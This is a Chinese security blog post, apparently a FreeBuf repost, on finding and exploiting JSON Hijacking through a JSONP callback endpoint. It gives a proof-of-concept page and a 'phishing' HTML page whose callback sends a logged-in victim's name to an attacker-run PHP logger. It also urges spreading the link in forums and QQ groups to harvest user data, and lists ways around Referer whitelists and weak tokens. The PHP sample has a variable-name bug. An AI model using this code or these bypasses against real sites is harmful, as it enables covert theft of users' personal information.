小学生都会挖掘的JSON Hijacking实战利用

栏目: 后端 · 前端 · 发布时间: 5年前

内容简介:JSON Hijacking漏洞的详细利用,有点类似与CSRF,不过原理利用方式不同,在这边文章我着重讲解json跨域劫持的利用环境搭建与方式。一般挖掘的过程中,burpsuite代理的History做寻找,过滤多余不可能存在漏洞的一些链接,如下图所示:

前言

JSON Hijacking漏洞的详细利用,有点类似与CSRF,不过原理利用方式不同,在这边文章我着重讲解json跨域劫持的利用环境搭建与方式。

0×01漏洞的挖掘

一般挖掘的过程中,burpsuite代理的History做寻找,过滤多余不可能存在漏洞的一些链接,如下图所示:

小学生都会挖掘的JSON Hijacking实战利用

我们在返回包中json格式发现了如下的敏感信息(用户Id,用户名,用户手机号码)。

小学生都会挖掘的JSON Hijacking实战利用

0×02漏洞的证明之poc

提交漏洞,poc在众测时要争分夺秒,所以这边用了最精简的一个POC。

假如返回的数据为:

txf({“data”:{“name”:”唐晓峰”}});

<html>
<head>
<script>
function txf(a){
alert(a.data.name);
}
</script>

<script src=http://***.***.**/wm/User/getUserInfo?callback=txf></script>
</body>
</html>

即可如下弹窗:

小学生都会挖掘的JSON Hijacking实战利用

0×03漏洞的利用之钓鱼

1.准备一台web服务器,我直接phpstudy搭的。

附上服务器端的代码

json.php
<?php
$nickname=$_GET['name'];
$fp = fopen('info.txt','a');
$flag = fwrite($fp, "名字:  ".$name."\r\n");
?><html>
钓鱼.html
<head>
    <title>txf</title>
<script>
	var xmlhttp;
    function txf(a)
    {
    xmlhttp=new XMLHttpRequest()
	var x="http://***.***.***/json.php?name="+a.data.name;
	xmlhttp.open("GET", x, true);
	xmlhttp.send();
	}
</script>>
<script src=http://***.***.***?callback=txf></script>
</head>
<body>
	<textarea>钓鱼啦,傻瓜</textarea>>
</body>
</html>

把钓鱼链接http://***.***.***/钓鱼.html发给该网站已登陆的用户,如论坛,社区QQ群,社区贴吧等,服务端即可获取到大量用户敏感数据。

这边以hackone的一个项目为例:

小学生都会挖掘的JSON Hijacking实战利用

0×04漏洞的修复与绕过

因为这个例子是小伙伴发过来的还没修复,所以都脱敏了,我们再从开发修复的角度去思考如何绕过修复。

1.Referer白名单

子域名绕过,文件名绕过,空Referer绕过

2. 增加token认证

token足够复杂或者服务端加密,我们无法绕过,如果token很简单,如纯数字,我们可以尝试遍历绕过

3.接口禁用

无敌的操作,无法绕过

总结:

非常有意思的一个劫持,以前没有利用过,只是知道有这么个东西,一般众测或者项目上遇到我都是直接截图,申明一波敏感信息泄露,然后就结束了,很低危,这次实战利用之后,稍微提高了一点逼格。

*本文作者:zhukaiang7,转载请注明来自FreeBuf.COM


以上所述就是小编给大家介绍的《小学生都会挖掘的JSON Hijacking实战利用》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

SEO实战密码

SEO实战密码

昝辉Zac / 电子工业出版社 / 2015-7 / 69.00元

本书是畅销书升级版,详细和系统地介绍了正规、有效的SEO实战技术,包括为什么要做SEO、搜索引擎工作原理、关键词研究、网站结构优化、外部链接建设、SEO效果监测及策略修改,SEO作弊及惩罚、排名因素列表、常用的SEO工具、SEO项目管理中需要注意的问题等专题,最后提供了一个非常详细的案例供读者参考。 第3版增加了移动搜索优化、APP排名优化、百度2015年排名因素调查结果等新内容,并对前两版......一起来看看 《SEO实战密码》 这本书的介绍吧!

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换